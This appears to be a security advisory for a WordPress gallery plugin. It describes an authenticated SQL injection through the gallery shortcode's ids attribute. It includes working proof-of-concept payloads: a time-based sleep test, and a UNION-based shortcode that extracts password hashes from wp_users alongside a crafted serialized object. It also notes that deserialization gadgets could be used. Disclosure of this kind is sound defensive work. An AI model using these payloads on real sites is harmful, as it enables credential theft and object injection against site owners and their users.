CVSS3: 8.1 High
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE

CVSS2: 5.5 Medium
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:N
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
The plugin does not sanitise, validate or escape the ids attribute of its gallery shortcode (available to users with a role as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection. Because the injected query also controls the rows handed back to the gallery renderer, the issue can be used both to disclose data from arbitrary tables and to have attacker-supplied serialized objects unserialized.
Simple PoC to prove the SQLi: as a user with a role as low as Contributor, add the following shortcode to a page or post, then preview or view it and note the 10s delay:
[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]
-- Reporter PoC:
This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.
To prepare for data disclosure, we first need to get a serialized version of _wp_attachment_metadata. Of course, if you are here for deserialization, this can be replaced with serialization gadgets.
This is the JSON I used for this:
{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}
Run it through base64_encode(serialize(json_decode(PAYLOAD))) to get the serialized payload.
Shortcode payload for leaking users' password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]
This should produce HTML like the following (base64ed):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
<div class="mgl-icon">
<div class="mgl-img-container">
</div>
</div>
<figcaption class="mgl-caption">
<p>LEAKED PASSWORD HASH/</p>
</figcaption>
</figure>
</div></div>